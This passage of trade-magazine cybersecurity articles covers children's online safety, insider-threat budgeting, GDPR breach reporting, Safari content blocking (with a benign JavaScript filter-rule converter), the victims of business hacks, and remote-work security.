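`password_problems("Hockey2021!!")` passes the length and character-class rules but is still rejected for the embedded word, which is the case a length-only check misses.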

Remember that anything posted online is public, not private information. So, talk to your children about what they’re not allowed to post online. They should never post any sensitive personal information (e.g. social security number, passwords, etc.) on their internet profiles: changing a profile does not delete old copies of it.

Cyberbullying

Communication is a key step to prevent cyberbullying. Explain to your children that what happens on the Internet can be permanent and damaging. You should treat people the same way online as you would in person: with respect. This includes not saying anything mean or untrue about someone online. Ask your children’s school what disciplinary measures are in place for online misbehavior.

Report online harassment, including any message that makes your children feel uncomfortable. If the harassment occurred through your children’s remote learning platform, notify their school. You can also report harassment to local law enforcement. Make sure to save and print any records of threatening messages—including screenshots, emails, and texts—for evidence.


About the Author

Nevin Markwart is the incoming Chief Information Security Officer (CISO) for FutureVault Inc., an innovative internet cloud-based personal document storage, access and distribution company.

Initiating his third professional career, Nevin graduated in 2019 with a Master of Science degree in Cybersecurity from Brown University, the Ivy League school located in Providence, Rhode Island. Nevin is an online information privacy expert, having written his graduate thesis paper, “Restricting the Adverse Effects of Internet Terms of Service Agreements,” with the support of his non-faculty academic advisor Tom Ridge, former Governor of Pennsylvania and first US Secretary of the Department of Homeland Security.

Previously, Nevin was the Boston Bruins’ first pick in the 1983 NHL Entry Draft and turned pro immediately after the draft at age 18. He went on to play nine seasons in the NHL, retiring due to the cumulative effects of three shoulder surgeries. After retiring from hockey, Nevin completed his MBA in finance from Northeastern University in Boston in 1994 and began another career in the investment management industry.

Nevin’s investment industry experience includes senior and executive roles in Boston as an equity analyst and portfolio manager, director of research, product manager, and head of Canadian equities for firms including Wellington Management and Fidelity Investments.

Later in his investment management career, Nevin led two Canadian mutual fund companies as CEO: Calgary-based Canoe Financial and Toronto-based Front Street Capital.

Nevin is a member of the Board of Directors of the Business of Hockey Institute (BHI), the Saskatchewan CFA Society, Prairie Green Renewable Energy Inc and Evolution Potash. He is also a business management mentor for the Canadian Consulate’s Canadian Technology Accelerator (CTA) in Boston.


More Internal Security Needed, Less Budget – 10 Tips to Help
By Jody Paterson, Founder and Executive Chairman, ERP Maestro

As if internal risks of fraud and data breaches were not high enough, enter a year of new work environments and economic uncertainty that has ushered in an even more risk-prone era. Before we even knew the word “COVID,” the frequency of fraud had tripled over the preceding four years, according to the Ponemon Institute’s 2020 Cost of Insider Threats report. By August of this year, a survey conducted by the Association of Certified Fraud Examiners (ACFE) revealed that 77 percent of respondents said they had observed an increase in the overall level of fraud since the pandemic began, with one-third noting that the increase had been significant. The near-term future doesn’t look better: in the same ACFE report, 92 percent expected fraud to increase in 2021. However, fraud isn’t the only concern. Data theft by employees has also risen, and research firm Forrester expects data breaches caused by insiders to increase by 33 percent in the year ahead.


The cause? More remote work, fear of unemployment and easier ways to access and remove data are the reasons cited. At the same time, companies are reluctant to allocate more money for safeguards, even though the need for improved security is apparent. Yet we know that leaving risks undetected can end up costing much more than the security solutions designed to prevent them. How, then, can companies get greater protection for business systems while also keeping costs down? The following 10 tips can help.

Establish a Security Control Baseline

When developing a strategy and cost-saving budget, start by establishing a security control baseline. A company’s security baseline is the minimum internal security controls needed to keep a system protected and the base objectives that must be met to achieve security goals.

Perform a Risk Assessment

Along with creating a security control baseline, determine your current risk level with an analysis of access risks by user, role and business process. This review will provide a deeper comprehension of key areas of risk and how to tackle them as cost-effectively as possible.

Calculate Your Risk Tolerance

Along with a risk assessment, a company should know exactly what its risk tolerance is – how much risk it can afford to have. While risk threshold determines how much risk is acceptable before action must be taken, risk tolerance gets into the dollars and cents of what a company can afford if an incident occurs. A company needs to weigh the potential cost of fraud, data breaches and mishaps by employees to determine if it can tolerate that amount of risk and loss.

Decrease Audit Deficiencies

Companies meeting audit compliance requirements for Sarbanes-Oxley have to think through the risks and costs of audit deficiencies and material weaknesses and add those to their probability of risks. Reducing risk – even audit risks – to begin with can be the more cost-effective posture to take.

Reduce Risk Remediation

Cutting the cost of access risk remediation is another budget-saving strategy. By running a risk analysis more frequently, risks can be found promptly and remediation work can be performed as risks arise rather than accumulating a massive number of risks and creating an overwhelming amount of remediation work all at one time. Such a scenario may slow remediation processes and even let some remediation slide, thereby leaving a company open to a greater risk of damaging incidents.


Eliminate Complexity

Manual processes or risk analyses are more complex and harder to perform. Simplify processes as much as possible to reduce errors, time and cost. But also think about more simplicity in whatever technology you use to help control risks. Bear in mind that an intuitive user interface and risk reporting can drive greater adoption and use while reducing training, costs and risk in general.

Leverage Automation

Lowering risks, cutting audit deficiencies and reducing remediation work are easier to achieve with automated tools. Organizations can not only save hours and hours of time spent on manual work but also improve accuracy and remediate any risks faster.

Cloud Technology

Most companies today realize the value of automation, which can be achieved in both on-premises and cloud technology, but cloud technology can add advantages and savings not possible with on-premises solutions. Cloud technology can come with some significant cost savings, from no-cost deployments, to an end to continual upgrades and maintenance, to extreme flexibility and long-term agility.

Rank Your Solution Needs

One way to be more cost-conscious in security spending is to rank the importance of features in internal security and access control tools. One way to break this down is to think about not only what you need today but also what you might need tomorrow and what features are nice-to-haves versus must-haves. An important caveat here, however, is to not buy any unnecessary bells and whistles. Spending more doesn’t indicate that you have better cybersecurity readiness. Throwing more money at a problem isn’t the best approach. Research firm Gartner points out that a company may spend more money but invest in less-suitable solutions, therefore, inadvertently bloating budgets and making the business more susceptible to risk.

Employee Training

It may not be so obvious to include employee training when thinking about maximizing your budget. The truth is, however, that even after taking all the measures you can with best practices and technology, insider attacks are attributed to employees of every rank. An all-inclusive security program should make training on internal risks, as well as external cyber threats, a priority.

In conclusion, cutting costs for internal security shouldn’t mean cutting necessary security solutions or not investing in new or better tools. There are ways, using the tips above, to keep costs at a minimum while getting better risk protection.


About the Author

Jody Paterson is a trusted governance, risk and compliance advisor and thought leader who is a Certified Information Security Specialist (CISSP), a Certified Information Security Auditor (CISA), a former KPMG director, and Chairman and Founder of ERP Maestro.

Jody can be reached online at [email protected], on LinkedIn at https://www.linkedin.com/in/jodypaterson/ and via our company website http://www.erpmaestro.com


Personal Data Breaches for GDPR Compliance: Everything You Need to Know
By Dan May, Commercial Director, ramsac

In the new era of cybercrime, identifying the proper sanctions and reactions for any business can seem challenging, if not confusing. When it comes to data protection and operational compliance in the digital world, authorities like the Information Commissioner’s Office (ICO) have identified a sense of confusion surrounding incident management, including the process itself. The ICO recently revealed that nearly a third of the 500 reports of data breaches it receives weekly are unnecessary or fail to meet the minimum threshold of a GDPR personal data breach. As many operations attempt to comply with GDPR (the General Data Protection Regulation), there remains an unfortunate atmosphere of confusion, or misunderstanding, when it comes to appropriate incident management under data protection regulation. Operations seem to struggle with the types of incidents or breaches that should be officially reported under GDPR. It is understood that ‘over-reporting’ is the most common reaction to perceived breaches. Whilst this is largely motivated by a desire for operational transparency and good compliance practice, clearing up misconceptions surrounding GDPR and data breaches can help businesses remain competitive by avoiding risky or costly penalties.


Identifying personal data breaches

Over-reporting is not a strategy as much as it is a scattered reaction to a data breach. Under GDPR compliance, which is far-reaching across European territories and beyond, there is a new urgency to officially report compromises that might upset data protection within your organisation. It is also considerably more than a mere courtesy to your employees: it is an attempt to strictly regulate the collection, movement, and storage of personal information, which is why it is most often a challenge to companies with access to larger amounts of data.

Defined under the General Data Protection Regulation, a personal data breach can be understood as a “breach of security leading to the accidental or unlawful destruction, loss, alteration, unauthorised disclosure of, or access to, personal data transmitted, stored or otherwise processed” (captured in Article 4, definition 12). Importantly, not all ‘breaches’ are equal in severity and, therefore, not every incident needs to be officially captured and reported. For any compromise that falls outside of the GDPR definition, or where the severity is limited, action isn’t necessarily required. The goal for businesses should be clarifying whether action is officially required or not.

But how does this look in everyday practice? It is always advisable to evaluate incidents and cases individually, determining the next actions based on the severity of each breach. Some breaches may affect or inconvenience the role of a single employee, whereas other, larger compromises can impact the emotional, physical, or financial lives of many. Any business that suffers a breach should plan to formally document what happened and any next actions, including whether it was reported or if it failed to meet the criteria. This can help businesses in the scenario that a decision is challenged.

How soon should a breach be reported?

All businesses are responsible for identifying, and responding to, breaches under data protection law. Not only should businesses aim to have the right controls in place to promptly detect a breach, but they should report any compromises within 72 hours to the supervisory authority (as summarised in Article 33). One of the most common misconceptions about compliance with GDPR is that this mandatory reporting period means 72 “working” hours, whereas a breach should be reported within 72 hours from the moment of discovery. Where employees or the public might be affected by unauthorised data breaches, those affected should be appropriately notified. In certain scenarios, a business may even need to release a press statement. This will allow those affected parties an opportunity to take precautions and guard themselves from any fallout.

What needs to be officially reported?

Compliance requires expertise, and failures, delays, or inaccuracies when businesses respond to the ICO’s request for information are increasingly common. Preparing for incident management within your organisation means understanding your responsibilities when a breach is detected and how it needs to be managed – including documenting actions.


Refer to the ICO’s data breach reporting assessment for the kinds of information required following a breach and the depth expected from your investigation. The ICO expects every business to demonstrate the depth and breadth of their investigation by responding to everything from breach discovery to management of its effects. Failure to respond properly to data breaches, under the GDPR, can result in heavy fines and penalties. The role of data protection cannot be underestimated, both in how your company plans to prevent breaches and how it will manage any future ones. Compliance with GDPR, even though commonly misunderstood, can define how your operation does business in the markets under data protection governance.

About the Author

Dan May is the Commercial Director at ramsac, providing secure, resilient IT management, cybersecurity, 24-hour support, and IT strategy to growing businesses in London and the South East.


Brave New World: Safari Content Blocking
By Andrey Meshkov, CEO and CTO at AdGuard

● Content blocking is not a priority for Apple and WebKit.
● Content blocking in Safari is possible despite all its issues and limitations.
● If we want to improve it, we need to contribute to WebKit ourselves.

This article is about content blocking on Apple platforms, mainly iOS. Why is it important to talk about Apple? First of all, it's Apple, and it enjoys a large enough market share that many users will be affected by its content blocking capabilities (or lack thereof). Secondly, Manifest v3 is coming to Chromium, and half of the tech problems in Chromium have been solved, unlike Safari. There are a lot of similarities between the two, so we’ve been able to draw some conclusions about where Safari is falling behind. In this article, we’ll go over the content blocking methods available on iOS, and see how to get around the limitations when possible.


Content blocking in general: System-wide filtering

There are only two options for content blocking: System-wide filtering and Safari Content Blocking. System-wide filtering is not as widespread as Safari Content Blocking for a number of reasons. However, it’s the only way you can go beyond Safari and do content blocking in other apps and browsers. Furthermore, System-wide filtering actually was possible even before Safari Content Blocking was introduced in 2015. One of the first content blockers on the App Store, in fact, was quite a popular app called WeBlock, which did system-wide filtering.

All System-wide filtering methods are based on the NEVPNManager API. Using a local tunnel, the app can filter DNS, use a PAC file to block requests, scan SNI, or even intercept TLS. You can have all these in your app, but unfortunately nothing comes without downsides. There are techniques to bypass DNS filtering and PAC files, and there are also some technical limitations. For example, there’s a strict memory limit that iOS imposes on VPN tunnel processes, and it will kill any process that uses over 15MB RAM.

The App Store may not be consistent with Apple’s rules

The App Store Guidelines, Section 5.4, VPN Apps, states: “Parental control, content blocking, and security apps, among others, from approved providers may also use the NEVPNManager API.” But still, there are no guarantees that your app will be allowed on the App Store.

We at AdGuard have a sad history with the App Store. Everything was great back in 2015 when we launched the app, but then in 2018, Apple suddenly decided to ban all apps that did system-wide filtering. We even had to discontinue our AdGuard Pro app after that. Then after a year or so, they changed their decision again and the guidelines now contain an exemption specifically for parental control, content blocking and security apps. So we were back in business, the app was approved, and we started working on a major update, new features, and other cool stuff. In the beginning of 2020, we uploaded a major update and it was rejected again with pretty much the same wording as they had used two years before. The reviewer told me over the phone that it wasn’t his decision; they had gathered a committee that decided that they didn’t want to have a system-wide filtering app on the App Store. So in order to pass the review, we had to make some rather drastic changes to the app, go through the App Store appeal process and review board, and only then was it approved. At the same time, I see multiple apps that do very similar things to the ones that we weren’t allowed to, and nothing happens to them. This shows that an app may pass the review process, but some time later, another committee may kick the app out of the App Store—or it might never happen.

The Safari Content Blocking API has issues and limitations...

In contrast to system-wide filtering, there’s no controversy about Safari Content Blocking: it’s definitely allowed, and it’s safe to build an app on it. But nothing good comes without complications, so let's look at the issues and limitations of this API. Fortunately, some of them can be solved, if not fully then to an extent.

Safari Content Blocking comes with no debugging tools. The only tool available is the browser Console, where you can see which requests were blocked, but from the Console output it’s impossible to tell which rule blocked them. Figuring it out can be an annoying, time-consuming process.


AdGuard, EasyList and uBlock filters are all based on the original Adblock Plus “core” syntax. It has been extended since, but the “core” part is the same across all popular content blockers. Safari Content Blocking rules have nothing in common with this syntax, which is a problem, because we don't want to create special Safari-only filter lists, and Safari provides no tools for that either. What we want is to keep using the good old traditional filter lists like AdGuard and EasyList. For now, we use a real-time approach right on the device to automatically convert our rules into Safari Content Blocking rules for the AdGuard apps. This way we can convert about 90% of all EasyList and AdGuard filters so that they work on iOS.

...And slow compiling...

This point is actually pretty massive, because it’s the reason for some of the other limitations. Safari compiles every content blocker’s JSON file into a “prefix tree,” and the process is quite slow. For example, it takes over two seconds on a new MacBook Pro to compile a JSON file with a little over 30K rules. For comparison, it takes the AdGuard Android app less than a second to parse and compile a list with over 100K rules. The obvious difference is that our Android app uses a different syntax, which is not as complicated as regular expressions; perhaps it’s not as flexible, but it is specifically optimized for matching URLs.

That makes the next limitation easy to explain. A single content blocker cannot contain more than 50K rules, and that’s a hard-coded limit. We contacted the developers of WebKit (the browser engine behind Safari), and they told us that the main reason for this limit is how slow the compilation process is. They may raise it a little because new devices are faster, but that won’t magically solve our problems: there’s no room for a substantial improvement as long as the rules are based on regular expressions. This limit alone is a major problem: AdGuard Base filters plus EasyList have 100K rules in total and simply do not fit.

There are a couple of things we do to work around this. We can already convert our rules to Safari Content Blocking rules, but we also need some further modifications to make the resulting list as short as possible. One of them is to combine similar element-hiding rules into a single rule. This helps a lot, but it’s still not enough. Another is to remove obsolete or rarely used rules from the filter lists we use in Safari. Because that optimization can drop a rule a list still needs, filter list maintainers can use special “hints” to exempt rules from it.

But that’s not all. Now we come to the issue of multiple content blockers. AdGuard registers six content blockers for Safari, and the user is supposed to enable them all. So does six content blockers mean the limit is now 6 x 50K = 300K rules? Yes and no; it’s just not that simple. The problem is that these content blockers are completely independent, and the rules in one cannot influence the others. If one content blocker decides that a URL should be blocked, the other ones can’t undo that decision; if one decides that a page element should be hidden, it will be hidden, and the others can do nothing about it. That’s not how it works on other platforms, where different filter lists are supposed to interact with each other; a good example is EasyList’s supplementary language-specific lists, which fix issues on local websites by adjusting what the base list does.
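As an added example (this is not AdGuard’s converter; the hosts, selectors and filter lines below are made up for illustration), the following JavaScript converts a small subset of the Adblock Plus “core” syntax into Safari Content Blocking JSON. It does the two things the preceding paragraphs describe: it merges element-hiding rules that share a trigger so they count as a single rule against the 50K limit, and it emits @@ exception rules after the blocking rules, because an ignore-previous-rules action only undoes rules that precede it in the same content blocker. Lines it cannot translate safely (a $domain= modifier that would need both if-domain and unless-domain, which Safari rejects in one trigger, or a /regex/ rule) are counted as dropped rather than mistranslated.

```javascript
// Added example, not AdGuard's converter: a subset of the Adblock Plus "core"
// syntax -> Safari Content Blocking JSON, merging element-hiding rules that
// share a trigger so they count as one rule against the per-blocker limit.
const SAFARI_RULE_LIMIT = 50000; // hard per-content-blocker limit from the article

// Escape a literal host for use inside Safari's url-filter regex.
function escapeRegex(s) {
  return s.replace(/[.*+?^${}()|[\]\\]/g, '\\$&');
}

// "||host^" -> host or any subdomain, any scheme, then a separator or end of URL.
// Uses only constructs Safari's restricted regex dialect accepts (no alternation).
function hostAnchorToUrlFilter(host) {
  return '^[^:]+://+([^:/]+\\.)?' + escapeRegex(host) + '([/:].*)?$';
}

// Convert one filter line to a Safari rule, or null for comments and for syntax
// this converter deliberately refuses to translate.
function convertLine(raw) {
  const line = raw.trim();
  if (!line || line.startsWith('!') || line.startsWith('[')) return null;

  // Element hiding: "[domain,domain]##selector"
  const hideIdx = line.indexOf('##');
  if (hideIdx !== -1 && !line.startsWith('@@')) {
    const domains = line.slice(0, hideIdx);
    const trigger = { 'url-filter': '.*' };
    if (domains) trigger['if-domain'] = domains.split(',').map(d => '*' + d); // "*" = host + subdomains
    return { trigger, action: { type: 'css-display-none', selector: line.slice(hideIdx + 2) } };
  }

  // Network rule: "[@@]||host^[$option,option]"
  const isException = line.startsWith('@@');
  let body = isException ? line.slice(2) : line;
  let options = [];
  const optIdx = body.lastIndexOf('$');
  if (optIdx !== -1) {
    options = body.slice(optIdx + 1).split(',');
    body = body.slice(0, optIdx);
  }
  const m = /^\|\|([a-z0-9.-]+)\^?$/i.exec(body);
  if (!m) return null; // plain-text patterns and /regex/ rules are out of scope

  const trigger = { 'url-filter': hostAnchorToUrlFilter(m[1].toLowerCase()) };
  for (const opt of options) {
    if (opt === 'third-party') trigger['load-type'] = ['third-party'];
    else if (opt === '~third-party') trigger['load-type'] = ['first-party'];
    else if (opt.startsWith('domain=')) {
      const list = opt.slice('domain='.length).split('|');
      const incl = list.filter(d => !d.startsWith('~')).map(d => '*' + d);
      const excl = list.filter(d => d.startsWith('~')).map(d => '*' + d.slice(1));
      if (incl.length && excl.length) return null; // Safari rejects if-domain + unless-domain together
      if (incl.length) trigger['if-domain'] = incl;
      if (excl.length) trigger['unless-domain'] = excl;
    } else return null; // unknown modifier: drop rather than mistranslate
  }
  return { trigger, action: { type: isException ? 'ignore-previous-rules' : 'block' } };
}

// Compile a list: merge css-display-none rules with identical triggers, and emit
// exceptions last, since ignore-previous-rules only undoes rules that precede it
// in the same content blocker (it cannot reach into another blocker at all).
function compile(lines) {
  const hiding = new Map(); // JSON(trigger) -> [selectors]
  const blocking = [], exceptions = [];
  let dropped = 0;
  for (const raw of lines) {
    const rule = convertLine(raw), t = raw.trim();
    if (!rule) { if (t && !t.startsWith('!') && !t.startsWith('[')) dropped++; continue; }
    if (rule.action.type === 'css-display-none') {
      const key = JSON.stringify(rule.trigger);
      hiding.set(key, (hiding.get(key) || []).concat(rule.action.selector));
    } else (rule.action.type === 'block' ? blocking : exceptions).push(rule);
  }
  const merged = [...hiding].map(([key, sels]) => ({
    trigger: JSON.parse(key), action: { type: 'css-display-none', selector: sels.join(', ') },
  }));
  const rules = [...merged, ...blocking, ...exceptions];
  return { rules, dropped, overLimit: rules.length > SAFARI_RULE_LIMIT };
}

// Constructed sample list (hypothetical hosts; not an EasyList or AdGuard excerpt).
const SAMPLE_FILTER = [
  '! constructed sample',
  '||ads.example^',
  '||tracker.example^$third-party',
  '||cdn.example^$domain=news.example|~blog.example', // if-domain + unless-domain: dropped
  '@@||ads.example^$domain=partner.example',
  '##.ad-banner',
  '##div[id^="sponsored-"]',
  'news.example##.promo',
  'news.example##.sidebar-ad',
  '/banner[0-9]+\\.gif/', // regex rule: dropped
];

const compiled = compile(SAMPLE_FILTER);
console.log(JSON.stringify(compiled.rules, null, 1),
  `\n${compiled.rules.length} rules from ${SAMPLE_FILTER.length} lines, ${compiled.dropped} dropped`);
```

Running it on the constructed list yields five Safari rules from nine filter lines: the four element-hiding rules collapse into two (one global, one scoped to news.example via if-domain), the two network blocks keep their load-type, and the exception lands last. The two dropped lines are the point of the 90% figure above: a converter that guesses at unsupported syntax produces rules Safari will either reject at compile time or apply more broadly than the list author intended.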


...And slow development

This is basically the full list of changes implemented in Safari Content Blocking:

● 2015 - Safari Content Blocking is implemented
● 2016 - Added one new feature (make-https) and fixed a couple of major bugs
● 2017 - Added one more new feature (if-top-url), which is pretty useless if you ask me, added content blockers to WKWebView, and fixed a couple of bugs

Then it drastically slows down…

● 2018 - fixed a couple of bugs, refactoring
● 2019 - fixed a couple of bugs
● 2020 - no significant changes so far

This year, we, together with Cliqz, Brave, Adblock Plus and some other developers, wrote an open letter compiling a list of the most pressing issues. Whatever the severity of those issues, it doesn’t mean that the WebKit developers are undermining content blockers. To us, it just seems that it isn’t a priority for them, or that they have limited resources, or both.

Do it yourself!

Regardless of the reasons behind WebKit’s laxness, it seems the only option we have is to do it ourselves, since content blocking remains a priority to us. WebKit is open source and they are open to contributions, so that seems like a good way forward. We may want to start with a proposal or a detailed specification of the changes we would like to implement in WebKit and see if it gets approved. I hope it does, and then we can implement it ourselves.

About the Author

Andrey Meshkov is a co-founder and CTO of AdGuard ad blocker. He's been working in IT for over 15 years and has accumulated a lot of experience not just in his primary area but also in related ones, such as online privacy. Sometimes the urge to share his thoughts becomes too strong and he takes a break from coding to write an article or two. Andrey can be reached online at https://twitter.com/ay_meshkov/.


When Businesses Get Hacked: Who Are the Victims?

This article looks into who the victims are when an organisation comes under attack.

By Nicole Allen, Marketing Executive, SaltDNA

Cyber attacks occur every two and a half minutes, according to Government statistics, which is why ensuring that your company is protected and secure is critical. Threats come in many forms and vary in severity. Attackers deliberately try to inflict damage by persuading one employee to make one mistake that gives them access to everything they need. The question is not so much "Which sectors are targeted the most?" as "Which sectors are most likely to suffer the greatest loss as a result of a cyber attack?" Today's cyber criminals are not a homogeneous group. Some spend months at a time attempting to extract data and funds from a single company; others target hundreds of companies with phishing emails and similar techniques, hoping that a handful of curious workers will open a mass-mailed attachment, and then extort money, for example under threat of a DDoS attack. These strategies mean their attacks keep moving on to a fresh batch of victims. So who are the victims of these attacks, and how are they affected?

Employees

The repercussions of cyber attacks are felt by companies across the globe: the global economy has lost 5.2 trillion dollars over the past five years. Cyber attacks, however, go well beyond financial losses. A Kaspersky survey found that 31% of cyber attacks lead to job losses, because employees were involved in the exposure of customer data. According to the Data Security Breaches Report, 32% of all organisations reported cybersecurity breaches over the last 12 months. The method of attack varies, but the best known examples break down as follows: 80% of attacks were phishing, 28% involved attackers impersonating an individual by email or online, and 27% were ransomware attacks. All of these take advantage of employees and pose major threats to companies.

A strong security plan must include sufficient controls to maintain a basic level of security, a tracking system to investigate attempts to breach the policy, and training for all employees. When it comes to defending themselves from cyber attacks, many businesses fail to recognise that their people are as important as the tools they deploy. Attackers use a variety of low-tech tactics to take advantage of employees, including baiting, fake unsubscribe links, social engineering, keyloggers and insider threats. It is in the best interests of every company to make sure that its workers have the expertise, knowledge and skills they need to protect the company and themselves from catastrophic cyber attacks and data breaches. This means ongoing education and training, with the active participation of the organisation's IT department. Every employee should receive training in data processing, security, secure communications and disposal best practices from the moment they join. The danger of cybersecurity threats should not be underestimated, and it is up to employers to ensure their workers have the resources required to keep business data secure at all times.

Business Owners

A successful cyber attack will cause your organisation significant harm. It can hit your bottom line as well as customer confidence in your brand. The effect of a security breach can be broadly divided into three categories: financial, reputational and legal. Cyber attacks can have devastating consequences for a company, up to the point of shutting it down. A 2018 IBM study looked at 477 companies from 15 countries that had suffered some form of data breach and asked how the organisation was impacted. In that study the healthcare sector was by far the worst hit in terms of overall damages, with average costs of more than $400 per compromised customer record; financial services, at just over $200 a record, was a distant second. The financial loss usually comes from corporate identity theft, theft of financial information (e.g. bank or credit card data), theft of money, trade interruption (e.g. being unable to carry out online transactions), or loss of trade or contracts.

Trust is an integral element of the relationship between customers and businesses. Cyber attacks can harm the credibility of your organisation and erode the trust your clients have in you, which in turn can lead to customer loss, loss of sales and a drop in earnings. Reputational harm may also affect your suppliers and your relationships with partners, investors and other third parties.

From a legal standpoint, data protection and privacy laws expect you to manage the security of all personal data you hold, whether it belongs to your employees or your clients. You can face fines and regulatory penalties if this information is unintentionally or purposely breached as a result of the company failing to enforce adequate security measures. British Airways is a prime example, having been fined £20 million for a data breach which affected more than 400,000 of its customers.

Customers

Cyber attacks are more likely to occur as cybercrime becomes more profitable, so it is important to understand the short- and long-term impact they could have on your organisation. Just as business owners see their reputation damaged, customers' perception of the company will change for the worse. According to a Forbes Insights report, 46% of organisations suffered damage to their reputation and brand value as a result of a data breach. Once the public sees an organisation in a bad light, its reputation is almost impossible to repair; just ask Toyota, Tesla, Hancock Health or any of the other brands that have suffered a data breach.

Lawsuits and fines are another long-term consequence for businesses. There has been a huge increase in class action lawsuits in both the US and the UK as victims seek monetary compensation for the loss of customer data. When cyber attacks leak large quantities of personal information, civil lawsuits are common, and these cases can take years and cost a great deal to resolve. According to a report by security firm Norton, 978 million people in 20 countries lost money to cybercrime in 2017.

How can you prevent your business from falling victim to a cyber attack? Even the most robust organisations can be affected by data breaches, so managing the risks accordingly is very important. An effective cybersecurity incident response plan and a secure communications platform will help you reduce the chance of an attack succeeding in the first place, and will ease the pain of managing incidents when they do arise. If you're still reading, you will be very aware that you're vulnerable to cyber crime. It is the new normal for businesses of all sizes. Media reports concentrate on corporate mega-attacks and breaches, but small businesses are the new frontier for cyber criminals, as discussed earlier.

At SaltDNA we work with organisations of all sizes across the world to enable them to have secure, confidential conversations wherever they are, at any time. Your best bet to ensure that a cyber attack never becomes your reality is to deploy a secure communications platform alongside comprehensive and ongoing employee education on cyber security. For more information on this article, to sign up for a free trial, or to talk to a member of the SaltDNA team, please contact us at [email protected].


About SaltDNA SaltDNA is a multi-award winning cyber security company providing a fully enterprise-managed software solution giving absolute privacy in mobile communications. It is easy to deploy and uses multi-layered encryption techniques to meet the highest of security standards. SaltDNA offers ‘Peace of Mind’ for Organisations who value their privacy, by giving them complete control and secure communications, to protect their trusted relationships and stay safe. SaltDNA is headquartered in Belfast, N. Ireland, for more information visit SaltDNA.

About the Author Nicole Allen, Marketing Executive at SaltDNA. Nicole completed her university placement year with SaltDNA, as part of her degree studying Communication, Advertising and Marketing at University of Ulster. Nicole worked alongside her degree part time during her final year and recently started full time with the company having completed her placement year with SaltDNA in 2018/19.

Nicole can be reached online at (LINKEDIN, TWITTER or by emailing [email protected]) and at our company website https://saltdna.com/.


Security and Remote Management: What Is the Market Looking Like as We Head Towards 2021?

By Gil Pekelman, CEO, Atera

For many IT professionals and managed service providers (MSPs), remote management has always been part of the deal. Especially in today’s global economy, service providers are not always local to their clients, and it is far more efficient and effective to support customers from afar. The big difference since the COVID-19 pandemic hit the headlines is that employees are now working from home, which is a whole different ball game from managing people in an office environment. Instead of managing a centralized location, there are now many remote offices, all with different needs and security set-ups.

When working from home, employees are much more likely to be using personal devices or shared computers, yet they are still accessing sensitive customer information, much of which is governed by compliance regulations. Home networks are typically less secure than office networks, with weaker controls in place. A single vulnerability on one of them could bring a whole network down and compromise an entire company.


A Checklist for Remote Management of Home Workers

With many companies already extending WFH policies through to Q2 of 2021, and maybe longer, and the FBI reporting a 400% increase in reported cybercrime since the start of the pandemic, security procedures are more important than ever.

It’s therefore essential that security teams up their game. Here are 5 top tips for IT professionals looking to secure their employee or client remote environments, and better educate end-users about working from home:

1. Educate Against Phishing Threats: Most cyberattacks start with a malicious link or attachment, which only works if an employee falls for the scam. Keep your employees up to date on the latest lures, which at the moment sadly leverage fear around COVID-19, such as promising a vaccine or claiming you have been in contact with someone who has tested positive.

2. Don’t Forget Patch Management: Patched software is far harder to attack, so whatever your process, make sure that no employees are running old versions or end-of-life software at home. The best technology partners will let you automate software installation and updates through package managers such as Chocolatey or Homebrew, so that you’re never behind the times.

3. Think Home Network Vulnerabilities: You may need to think a little outside the box when it comes to protecting home networks. For example, how secure are your employees’ router settings, and what smart devices do they have connected to the home network? Take a thorough inventory of all connected devices, and start from there.

4. Multi-Layered is the New Secure: There’s no such thing as a silver bullet for enterprise security anymore, so your best bet is a layered approach to cybersecurity. This might start with user education for example, followed by URL or script blocking, and then file scanning and integrity monitoring, and so on. Even if an attacker gets through one line of defense, the next is ready and waiting.

5. Have a Disaster Recovery Plan: If all else fails, a robust disaster recovery plan will mean you can get back up and running as quickly as possible. Include a plan for business continuity, protecting sensitive information, minimizing financial loss and disruption to end-users, and an incident response plan to remain compliant with any relevant regulations. Make sure that your technology and service providers recognize the importance of securing this kind of unknown environment.


Looking Ahead to 2021, and Beyond

At the moment, none of us know what ‘the new normal’ is going to look like. For some, working from home will become commonplace, while others might move to a more hybrid way of working, some days from the office, some from home. We do know that organizations won’t want to risk being caught short again, struggling to securely manage at the same time as ensuring business continuity.

This signals a real change in mindset for today’s IT professionals. Many companies historically saw IT as a cost, rather than an investment. They couldn’t see the value in having IT support managing operations proactively, preferring to hope for the best and call in an expert if and when something needed attention, on a break-fix model. The pandemic has changed that, showing business stakeholders that they can’t afford to be unprepared, and that they need a proactive approach to managing both IT and security.

The important thing when targeting this investment will be to ensure that security plays well with the rest of an organization’s IT ecosystem, whether that is integrated in their professional services automation, such as helpdesk software, or their remote monitoring and management (RMM), such as remote access technology. If security relies on employee behavior, or on multiple additional steps or vendor solutions, you’re going to struggle to ensure that you don’t have gaps.

If, on the other hand, security comes as part of a package deal, you don’t need to rely on employee or customer education alone. Think about software updates and patching that happen automatically without any impact on your business operations. Consider a backup solution that is working silently and effectively in the background. Onboard 2FA as part of the deal for employees from day one. Altogether, you’re creating a much more resilient and robust environment in which to work.

About the Author

Gil Pekelman is the CEO and Founder of Atera. Under Gil’s leadership, Atera has grown into the most innovative, industry leading platform for MSPs both large and small. Prior to founding Atera, Gil held senior positions at Indigo NV, (now a division of HP) and Exanet (acquired by DELL). He has a degree in Economics and Management from Tel-Aviv University and is the sole inventor of three patents. https://www.atera.com/


Working from Home? You’re Not Alone

The rise of cyber hacks in an age of remote working, and how to prevent them

By Steve Hanna, Embedded Systems Work Group Co-Chair at Trusted Computing Group (TCG), and Jun Takei, Japan Regional Forum Co-Chair at Trusted Computing Group

Technology is replacing a number of real-life activities, helping to maintain a level of normalcy and connection with familiar faces amid unprecedented times. As remote working continues to prove an ever-essential trend in light of the current global climate, organizational networks have expanded from single offices to residential spaces across the country, from kitchens to spare rooms. According to global tech market advisory firm ABI Research, connected home devices are expected to become more popular in the coming months, with a 30% year-on-year increase in sales projected and more than 21 billion Internet of Things (IoT) devices expected by 2025. Cloud services have also been adopted at an increasing rate by organizations to deliver remote services: 84 percent of enterprises now run a multi-cloud strategy, and cloud is expected to account for 70 percent of tech spending this year. As a result, collaboration tools, including various video conferencing platforms, are being used far more frequently as companies adjust to the new normal of telework. Meanwhile, social media and video calling services such as FaceTime are allowing families and friends to stay connected, and streaming services are providing entertainment on a more personal level.

